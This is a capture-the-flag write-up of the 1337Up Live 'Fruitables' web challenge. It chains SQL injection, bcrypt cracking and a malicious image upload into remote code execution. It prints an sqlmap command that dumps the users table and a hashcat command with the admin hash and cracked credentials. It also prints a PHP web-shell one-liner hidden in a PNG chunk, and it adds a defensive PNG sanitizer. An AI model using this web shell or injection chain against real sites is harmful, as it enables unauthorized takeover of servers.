
1337Up Live CTF web/Fruitables

My solution for the 1337Up Live CTF web/Fruitables challenge

Challenge overview

Fruitables

The Fruitables challenge presents a web application for managing fruit-related content. The application includes user authentication, an admin panel, and file upload functionality. The goal is to identify and exploit multiple vulnerabilities to ultimately retrieve a hidden flag file.

Initial reconnaissance

During the initial enumeration phase, I discovered the main application with an interesting endpoint at /account.php. This suggested potential authentication vectors worth investigating.

Analysis

SQL Injection

The registration endpoint was found to be vulnerable to SQL injection. Using sqlmap against the username parameter of the POST form, I dumped the database contents:

sqlmap -u "https://fruitables-0.ctf.intigriti.io/auth/fruitables_register.php" \
--data="first_name=a&last_name=a&username=a&password=a" \
--method POST \
--dump -p username

The dump revealed a users table containing usernames and bcrypt password hashes:

(screenshot: Fruitables Hashes)

Password cracking

Using hashcat in bcrypt mode (-m 3200) with the rockyou wordlist, I cracked the administrator's password hash; the password was futurama:

hashcat -m 3200 -a 0 '$2y$10$ukfji0VE/xBEBuwDFp/5b.fy6EjZ2VtaK6Xj0Wdip/viPEnVFqGGa' rockyou.txt

File upload vulnerability

After gaining administrative access, I discovered a file upload feature that accepted image files (JPEG/PNG). Through testing, I identified that:

  1. The uploads were accessible via the /uploads/ directory
  2. The application performed insufficient validation on file contents
  3. PNG metadata was not properly sanitized
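As an added defensive illustration (not part of the original writeup), here is the kind of content check the upload handler lacked, written in Python: it walks the PNG chunk structure verifying lengths and CRCs, rejects an IHDR that is not exactly 13 bytes or that carries a script marker, and rebuilds the file from critical chunks only, so text and metadata chunks cannot smuggle a payload through. The sample image and the marker list are constructed for the demo.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Chunks a viewer needs to render the image; every other chunk (tEXt, zTXt, iTXt, eXIf, ...) is dropped.
CRITICAL = {b"IHDR", b"PLTE", b"IDAT", b"IEND"}
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")  # constructed, minimal list for the demo

def chunk(ctype, body):
    """Serialise one chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

def parse_chunks(data):
    """Yield (type, body) per chunk, enforcing signature, lengths and CRCs."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body, crc = data[pos + 8:pos + 8 + length], data[pos + 8 + length:pos + 12 + length]
        if len(crc) != 4 or struct.unpack(">I", crc)[0] != (zlib.crc32(ctype + body) & 0xFFFFFFFF):
            raise ValueError("truncated chunk or CRC mismatch in %r" % ctype)
        yield ctype, body
        pos += 12 + length
        if ctype == b"IEND":
            return
    raise ValueError("missing IEND chunk")

def sanitize_png(data):
    """Return (clean_png, findings): the image rebuilt from critical chunks only."""
    findings, out = [], [PNG_SIG]
    for i, (ctype, body) in enumerate(parse_chunks(data)):
        if i == 0 and (ctype != b"IHDR" or len(body) != 13):
            raise ValueError("first chunk must be a 13-byte IHDR")
        tainted = any(m in body for m in SCRIPT_MARKERS)
        if ctype not in CRITICAL:
            findings.append("dropped %s chunk%s" % (ctype.decode("latin-1"), " (script marker)" if tainted else ""))
            continue
        if tainted:  # a marker in a chunk we must keep: refuse the file rather than pass it through
            raise ValueError("script marker inside critical chunk %r" % ctype)
        out.append(chunk(ctype, body))
    return b"".join(out), findings

# Constructed sample (not from the challenge): a valid 1x1 greyscale PNG whose tEXt chunk carries a PHP open tag.
SAMPLE = (PNG_SIG
          + chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
          + chunk(b"tEXt", b"Comment\x00<?php /* constructed marker */ ?>")
          + chunk(b"IDAT", zlib.compress(b"\x00\x00"))  # filter byte + one pixel
          + chunk(b"IEND", b""))
```

Re-encoding through an image library (GD, Pillow) achieves the same stripping with less code; the point of the hand-rolled walker is to show exactly which structural checks the vulnerable handler skipped.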

Exploitation

  1. Administrative access
    • Used SQL injection to dump the user database
    • Cracked the admin password hash
    • Logged in as administrator using tjfry_admin:futurama
  2. File upload
    • Created a malicious PNG file with embedded PHP code:

      <?php system($_GET["cmd"]); ?>

    • Embedded the code in the PNG IHDR chunk while maintaining a valid PNG structure
    • Successfully uploaded the file through the admin panel

      (screenshot: Fruitables Burp)

  3. Remote Code Execution (RCE)
    • Located the uploaded file in the /uploads/ directory
    • Executed commands using the cmd GET parameter
    • Retrieved the flag from /flag_poxm7AQwN77Lj2PU.txt

      (screenshot: Fruitables Flag)

Flag:
INTIGRITI{fru174bl35_vuln3r4b1l17y_ch3ckm8}

Conclusion

The Fruitables challenge demonstrated the importance of implementing proper security controls across multiple application components.

Key takeaways

  1. Always implement proper input validation and sanitization.
  2. Use strong password hashing algorithms and enforce robust password policies.
  3. Implement thorough file upload validation, including content inspection.

This post is licensed under CC BY 4.0 by the author.